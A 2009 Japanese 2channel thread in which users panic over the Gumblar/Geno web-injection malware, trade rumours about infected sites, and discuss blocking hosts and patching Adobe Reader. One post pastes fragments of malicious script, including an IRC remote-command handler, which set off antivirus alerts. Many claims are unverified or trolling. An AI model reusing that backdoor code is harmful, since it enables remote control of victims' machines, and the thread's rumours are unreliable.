なんだこれ

716 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:41 ]
>>710
閉じた。ありがとう。

717 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:40:50 ]
>>701
流れ早いしwやっかいそうだな

718 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:41:24 ]
>>707
サイト持ちが感染→気がつかずにサイト更新→サイト見た人が感染
のループ

719 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:41:25 ]
>>707
多分、見てる奴が作る奴兼ねてる率が滅茶苦茶高いから。

720 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:41:40 ]
アマゾン感染ならまじでニュースになるな



721 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:04 ]
>>706
問題ない。その日付だとMSSQL2005相当のヘルプファイルでたぶんVistaのデフォ。

722 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:05 ]
>>712
そうか光あたりを入れてた別だな

723 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:12 ]
豚フルの奴どこで感染したんだよ

724 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:21 ]
PC(XP Pro Sp3)内を検索してもsqlsodbc.chm見つからないんだけれど
ないとやばいの?

725 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:22 ]
スレチなのでいい加減止めるが
このウィルス、感染者のサイトを改竄して
普通のサイトをどんどんウィルスサイトにする所が怖い
最近では小林製薬とかのサイトも感染したんだぜ
もう述べ何万件も感染してるだろう(復旧したところもあるけど)
あんまりにも一部でしか騒がれてないからついつい書いたもにぃ

726 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:42:27 ]
>>674
基本全て禁止→個別に許可じゃないの?
個別に94.247.2.195を禁止ってどうやって設定するの?

727 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:07 ]
>>713
そしたらその日からそいつのことをスパーバカーと呼ぶことにする

728 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:07 ]
アマゾンは釣りだろw

729 名前:725 mailto:sage [2009/05/16(土) 12:43:11 ]
人生初めての誤爆orz

730 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:15 ]
>>703
逆に早くなるんじゃないの?



731 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:19 ]
>>707
同人サイトを検索するサーチエンジンが感染してる

732 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:28 ]
>>722
ADSLですが快適です

733 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:36 ]
konozama!!!!!

734 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:43:53 ]
>>578
その上、経済状況までクソ悪いんだからシャレになんねーよ今の世の中wwwどうなってんだよwww

735 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:44:20 ]
え、何、アマゾン陥没したんか?釣りだよな?

736 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:44:24 ]
DNSプリフェッチはONでも関係ないよね? あるのかな?

737 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:44:33 ]
ウイルス作るようなやつはもう終身刑でいいよ。

今回のような悪質なウイルスを作る奴は死刑。


738 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:44:33 ]
混乱したら困るから釣りはやめとけ

739 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:44:52 ]
>>721
ありがと
しかしVistaは大丈夫とか大丈夫でないとかどっちなんだかわけわからなくなってきてるな

740 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:44:58 ]
>>735
もう、どっちでもいいよorz



741 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:11 ]
>>705
体感速度は変わらないんだけどリンクに飛ぶたび、プログラムを選択しなくちゃいけないのがちょっとね

これで、どれだけ被害を防げるのだろう…

742 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:20 ]
釣りはよしとけ

743 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:41 ]
>>736
関係ない。DNSポイズニングならたいていのアンチウィルスで検知できるし。

744 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:45 ]
>>599
おい、avast反応したぞ・・・

745 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:48 ]
>>711
初心者はセキュリティ祖父と入れなくていいと思い込んでいそうですね^^;

746 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:51 ]
>>741
え?なんぞそれ
どういう状況?

747 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:45:53 ]
豚エンザ 報道中www がんがれますぞえ

748 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:46:11 ]
>>441フンじまったから
avastで「完全な検査」したら引っ掛かりまくりだなw
俺のPC終わったなw

749 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:46:20 ]
Amazonは釣り?

750 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:46:33 ]
しまった今までウイルスバスターやら火狐やら積んでなかった
今この状況で何積んどけばいいんだ



751 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:46:38 ]
いっそのことwindows全滅してくれれば・・・・
Mac,Linux,BSDの時代キター!?

まぁ、Vista以降だとアドレスランダム化があるから確実に進入は難しくなるけど。


752 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:46:44 ]
海外渡航歴なしって神戸終わったな

753 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:46:57 ]
>>743
そうですか ありがとう御座います

754 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:00 ]
神戸って外国?

755 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:12 ]
危険なアドを貼るときはまじで配慮しろよ
無知な奴がかなり踏んでるから

756 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:29 ]
>>754
ワラタ

757 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:34 ]
これどんな対策しても亜種が次々出て来てるんだよな・・・
根本的に解決できるまで専ブラで2chだけとかが安心だな

758 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:50 ]
まあkonozama陥落してなくても
今はネットショッピングとかやめといたほうがいいだろ

759 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:47:52 ]
>>726
そうだけど何が疑問なんだ?

760 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:07 ]
>>744
Avast!って過剰反応だよな。



761 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:10 ]
>>751
windows全滅してくれれば、
Mac,Linux,BSDにウイルス感染クルーだろ!

762 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:15 ]
ネットでクレカ使うの怖いね今は

763 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:27 ]
>>754
兵庫県は多国籍国家

764 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:48:37 ]
新型インフルエンザが流行したら篭城してネットでも楽しむかと思えば、
そのネットに接続するのも恐ろしい事態になるとは…。

765 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:39 ]
donutならボタンひとつでjava切れるから最強だな!!

766 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:41 ]
国内で豚インフル…?どうせ引きこもりだし関係ないしwww
ネサフしてれば時間なんて…

…え?

767 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:48:59 ]
>>746
リンク先に飛ぼうとする→このリンクは他のプログラムで開く必要があります→プログラムの選択→狐かその他を選択

みたいな流れ

768 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:02 ]
MacがやられてたらBSDも危ない
その逆もまた

769 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:02 ]
Janeでリンクからブラウザに飛ばないようにする方法ってないの?

770 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:26 ]
>>682
Amazonなのか釣りなのか答えてくれ



771 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:27 ]
>>758
・・・俺、つい5日くらい前にカードで買い物したばかりなんだ

772 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:45 ]
>>760
過剰・・・なのか?まじで怖いんだが

773 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:49:49 ]
近々欲しい物があって通販しようと思ってたけど
こりゃ普通のネット巡りも当分保留だな…

774 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:50:00 ]
ぜんぜん報道されてないみたいなんだけど なぜ?
どれくらいの実害がでるか想像できない状態なんだろ?

775 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:13 ]
どこの通販サイトなのか言ってくれ

776 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:17 ]
>>770
ダメな時は何してもダメなもんだ。あきらめれ

777 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:34 ]
>>769
設定でブラウザのパスを指定しない
ttpをNGに登録
そもそもネサフしない

778 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:40 ]
ttp://www.aguse.jp/?m=w&url=94.247.2.195&media=1&x=42&y=10
まぁどうせ練鯖なんだろうけど

779 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:43 ]
もうJS全部不許可にしとかないと何処も信用できないな

780 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:45 ]
>>774
放送の優先順位が豚ちゃん



781 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:49 ]
楽天だったら俺死亡

782 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:50:54 ]
992 名前:geno[sage] 投稿日:2009/05/16(土) 12:49:26 ID:GQnaax2E0
小学館とスクエニの公式の一部が感染してたぞ
ヤング系

783 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:50:59 ]
おいおい勘弁してくれ…

784 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:51:15 ]
>>774
蔓延してから報道するんだろうな
テレビっていつもネットより随分遅れてるし

785 名前:名無しさん@ゴーゴーゴーゴー! mailto:sage [2009/05/16(土) 12:51:51 ]
>>668>>683
そうなのか!?ありがとう、やってみる。

786 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:51:55 ]
>>779
今頃、気づいたか

787 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:51:56 ]
>>781
あれ?俺いつ書き込んだんだ?

788 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:52:52 ]
楽天市場は中古PC家が感染報告されてたよな

789 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:53:09 ]
このウイルスも厚生労働省に電話すればおk?

790 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:53:11 ]
>>784
この板来てここ見てるような人以外は
かなりのほほんしてるように感じるよ、ちゃねらでさえ今回は…



791 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:53:30 ]
これからは超漢字の時代が                       来ないな・・・

792 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:53:47 ]
>>599
此処って踏んで大丈夫だった?PCがフリーズしたんだけど・・・。知恵袋だよね?

793 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 12:53:54 ]
VISTAでパソコン重くなってないから大丈夫なん?


vistaの確認方法って>>7でおk?

794 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:54:09 ]
まさかこんな形で2chどころかネットが終わりを迎えるとは

795 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:54:36 ]
>>772
>>599の内容は、↓だから無害だよ。開いてもJavaScriptは実行されない。

ヨミサーチを設置後、htmlソースがおかしくなりました。

スクリプト記述部が

<script language=javascript><!--
(Genoウィルスの内容がテキストで張られている)--></script>

となってしまいました。
最初は普通にプログラムとして記述されていたのに
いつのまにかこんなことになっておりました。
なぜこうなってしまったのでしょうか。ウイルスでしょうか・・・
------------------------------------------------------------------------------------------------------------
ベストアンサーに選ばれた回答

doctorwho_torchwood_tardis_mayoさん

問題ありません。
特に気にしなくても結構です。
------------------------------------------------------------------------------------------------------------
そうなのですか・・・。ありがとうございました!
教えてください。お願いします。


796 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:54:51 ]
感染したら駆除方法はOSの再インスコしかないの?


797 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:54:52 ]
世の中ウイルスだらけ

798 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:54:57 ]
行きつけの古着屋のブログ行ったらadobeが暴走したwww

799 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:55:12 ]
>>767
なんでそんなことになるのかさっぱりわからんが、それ先読み切ったせいとは
まったく関係ないと思うぞ。

800 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:55:22 ]
ヤフーも感染かよ…



801 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:55:47 ]
ヤフーも?
やべーホームに設定してるのに

802 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:56:30 ]
感染してないサイトを探すほうが難しくなってきたな

803 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:56:42 ]
もう怖すぎるよぉ
しばらく引きこもる

804 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:56:42 ]
ヤホー?ナイツも感染したの?

805 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:56:45 ]
view-source:www.amazon.co.jp/

いまんところmartuないぞ

806 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:10 ]
>>800
まじで?

807 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:16 ]
>>782の小学館ってのはマジ?

808 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:33 ]
知恵袋死亡www

809 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:38 ]
あんまりホラ吹かれると洒落になんねえぞ

810 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:39 ]
pcだと感染するからPS3やwiiでネサフした方が良さそうだな。
いつかPS3・wii用のウイルスも出るんだろうけど。




811 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:57:52 ]
>>599
この質問・回答は役に立ちましたか?
はい いいえ .お役立ち度:6人中 0人が役に立つと評価しています。

評価0人で救われた

812 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:10 ]
>>800
ん?
>>599は開いても大丈夫だぞ。質問者は感染してるが。

813 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:15 ]
誰か>>599確かめて来いよw

814 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:31 ]
>>792
みんなしてこぞってアクセスし過ぎだよね

815 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:35 ]
こんなスパイウェア消えればいいのに

816 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:54 ]
一番安心なネサフ方法発見


ドリームキャストで(ry

817 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:58 ]
だから釣りはやめろってば…

818 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:59 ]
>>814
なるほど、そういうことか

819 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:58:59 ]
>>682
アドレス貼らずに名前を一部伏字で書いてちょ

820 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:04 ]
>>810ドリームキャストしか持ってねぇ



821 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:10 ]
MSNはまだ大丈夫だよな…?

822 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:26 ]
adobe readerでバージョンアップが必要なのって9.1の奴だけだよな?
9.1の 脆弱性付かれてるから9.1.1にする必要があるんだよな
9.0とか8の奴ってのとりあえず更新しないでおいたほうがいいよな

823 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:34 ]
釣りって下手すりゃなんたら業務妨害だっけ?

824 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:40 ]
楽天でショッピングできねぇえええええええ

825 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:45 ]
BeOS

826 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 12:59:52 ]
ドリキャスどこに閉まったっけか

827 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:12 ]
どこが感染したとか釣ってる奴ら
勘弁してください

828 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:27 ]
いつもながらAvast!は過剰反応だな。
Avast!入れてるPCだと確かに>>599に反応してしまう。

829 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:38 ]
>>772
テキストに反応してるだけでしょ?

830 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:00:41 ]
怖くてネット繋げねー



831 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:44 ]
持ってて良かったドリームキャスト

832 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:46 ]
感染が確認されたところまとめて欲しい

833 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:50 ]
LANがドリキャスのモデムにささらねえorz

834 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:00:54 ]
>>821
MSNでWEBメールをやっていたら
嫌でもスクリプトを許可しないと駄目だから感染したらキツイな

835 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:01:03 ]
>>767
自分も早速設定やったけどそんな事には・・・
違うとこいじったんじゃないかな?
因みにネット回線あんまり速くないんでちょびっと描画遅くなった気がするよ


836 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:01:05 ]
view-source:楽天

いまんところmartu/gumburなし

837 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:01:24 ]
avastは敏感に反応しすぎ

838 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:01:30 ]
>>829
だったら問題ないんだよな・・・?

839 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:01:56 ]
>>599
酷いな。YahooIDでログインして、回答に違反報告クリックしといたが、なんでまずいのかのコメントを
付けれないから、担当者が理解できるかどうか…。

取り敢えず、あの嘘回答で蔓延を加速させた奴の発言は、違反報告クリックしとけ。

840 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:02:01 ]
何この

かつてないリンク先誤クリックの怖さw



841 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:02:23 ]
楽天の場合は各ショップでhtml弄くるだろ?
そういうことだ

842 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:02:41 ]
よし、Adobe Readerを9.1.0→9.1.1にしたぞ
これで一安心だな

843 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:02:41 ]
>>833
なんかワロタ
走って合うの買ってこいw

844 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:02:53 ]
>>841
じゃあ同人系のショップがやられてるわけか

845 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:03:02 ]
ぶっちゃけ、ノートン大先生を最新に更新しておけば心配なし?

846 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:03:06 ]
こんな恐ろしい状況、ネット歴10年の俺は初めてなんだが

847 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:03:10 ]
>>838
問題ないよ。内容は>>795の通りで、質問者がテキストでGenoを張っていて
そのテキストにAvast!が反応しちゃってるだけ。

848 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:03:29 ]
とんだ週末になりそうだ

849 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:03:48 ]
>>845
ノートンはギャンブラーに反応してなかったんじゃ・・・

850 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:03:51 ]
>>845
ノートン大先生は全く名前が出てこないぐらいついてきていらっしゃいません



851 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:04:12 ]
>>845
いや、めちゃくちゃ心配。ほぼ全スルー。

852 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:04:27 ]
Web制作会社勤務だけど、
会社のPC(WinXP Pro SP2)が一台感染してた。オワタ

853 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:04:29 ]
>>847
ありがとう!死んだかと思ったよ・・・

854 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:04:59 ]
山田のときも祭りだったが、今回のはシャレにならん怖さがあるな

855 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:06 ]
ノートン先生もウイルスの進化に置いてけぼりくらってます

856 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:06 ]
ご老体ですから

857 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:17 ]
で、打開策はあるのか?このままじゃ感染が拡がる一方だが

858 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:18 ]
>>852
オワタwwwwww

859 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:20 ]
しばらく2chだけにしよう

860 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:34 ]
>>854
どこに地雷が埋まってるか解らないもんな



861 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:43 ]
誰か小学館とスクエニ見てきて…

862 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:56 ]
おまえら2ちゃんだけでいいじゃん

863 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:57 ]
>>854 山田オルタナティブって久しぶりに聞いた。

864 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:05:57 ]
しばらくは2chとヤフオクだけにするか・・・。

865 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:06:24 ]
>>852
やめろよなーwwww

866 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:06:37 ]
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
n0=on 900:text:!exec*:*:{.notice $nick Execut comanda: $2-

867 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:06:47 ]

※※※ gumblar.cnはmartuz.cnに引っ越ししたようです。 ※※※

ブロック範囲変更しないと…

868 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:06:59 ]
>>854
山田ウイルスは予防対策も出来たが、この手の奴はうっかり感染しそうだよ

869 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:07:15 ]
>>852生きろおおお

870 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:07:22 ]
>>867
何とかしてくれ



871 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:08:05 ]
>>867
え!また移動したのかよ!!!
勘弁してくれ!

872 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:08:11 ]
>>799
ごめw
違うところ変えてたorz

873 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:08:13 ]
山田みたいにみんなで楽しめるようにしてくれればいいのにね

874 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:10:55 ]
GENO社員必死だなw

875 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:11:03 ]
あれ?
てすと

876 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:11:12 ]
・東方 音楽サークルの告知サイト
・ひぐらし 男性向けイラストサイト
・コナン ノマカプサイト
・オリJUNEサークルの告知サイト
・ヘタリアの携帯向け同盟サイト(PCレン鯖)

感染拡大しすぎwwっうぇ

877 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:11:39 ]
豚インフルエンザ並みの拡大状況でヤバイな


878 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:11:44 ]
さっきからこのスレ更新するとノートンが反応するんだが

879 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:11:50 ]
スレ開いた途端にラブレター検出したんだが偶然か

880 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:19 ]
PCがウイルスに感染しているかどうかを確かめるには、
やっぱかスペルスキーのオンラインスキャンが手っ取り早いね



881 名前:名無しさん@お腹いっぱい。 [2009/05/16(土) 13:12:20 ]
とりあえずFlash PlayerとAdobe Readerはupdateしといた
水面下で着々と感染させてってある日…ってなるのか

882 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:21 ]
>>866のせいじゃないか?

883 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:24 ]
>>878
俺のノートン先生寝てるぜ?

884 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:26 ]
>>878
俺もそうだwwwwww
avastでもそうだがdatに結構反応すんだよな

885 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:27 ]
まだニュー速にたたないの?

886 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:12:47 ]
このスレ開くとAVGが反応するんだが
>>567->>873の間に何か貼ったか?

887 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:01 ]
すげー伸びててワロタ
流石に皆異常に気付きだしたのか

888 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:04 ]
>>879
同じ。

さっきから何度か開いてるけど、今急になった。
ノートン先生が反応したっすよ。

889 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:09 ]
>>878,879
>>866のせいですw

890 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:15 ]
>>866だな
もー余計なことすんなよー



891 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:16 ]
>>835
違うところ変えてただけだった

俺の友達が感染したかもしれないらしい


892 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:37 ]
XP厨が阿鼻叫喚で楽しいな。
何も分からずVistaをバカにしてた罰が当たったとしか言えない。

sqlsodbc.chm が改変されてるかチェックとか言ってるけど、
Vistaなら改変を試みた時点でUACが反応するし。

893 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:47 ]
このスレに貼られてるURLやコードに反応してるのか

894 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:54 ]
おや?俺のノートン先生、とうとうお亡くなりになったのか。

895 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:13:59 ]
ノートンがラブレター拾うなら心配ないじゃん

896 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:14:07 ]
うちは反応しないな
専ブラで更新するだけじゃ反応はしないのか?

897 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:14:23 ]
>>684
ワロタw

898 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:14:36 ]
>>890
セキュリティソフトの設定調整すれ

899 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:14:47 ]
>>895
昔からノートン先生はラブレター大好きだよな。

900 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:14:52 ]
Windows7とavastだけどなんもさわがねーぞ



901 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:15:34 ]
>>899
お年を召してもときめきは忘れない爺ちゃんって感じだな

902 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:15:46 ]
>>892
言っておくが現時点だからなw


903 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:15:53 ]
次スレドコー

904 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:10 ]
>>866のせいかよーwびっくりするだろwww

905 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:32 ]
>>866ってJaneでスレ開いてもやばい?

906 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:32 ]
>>612
さっき落ちてきたのがこれ

907 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/05/16(土) 13:16:35 ]
この不況だし感染企業潰れるかもな

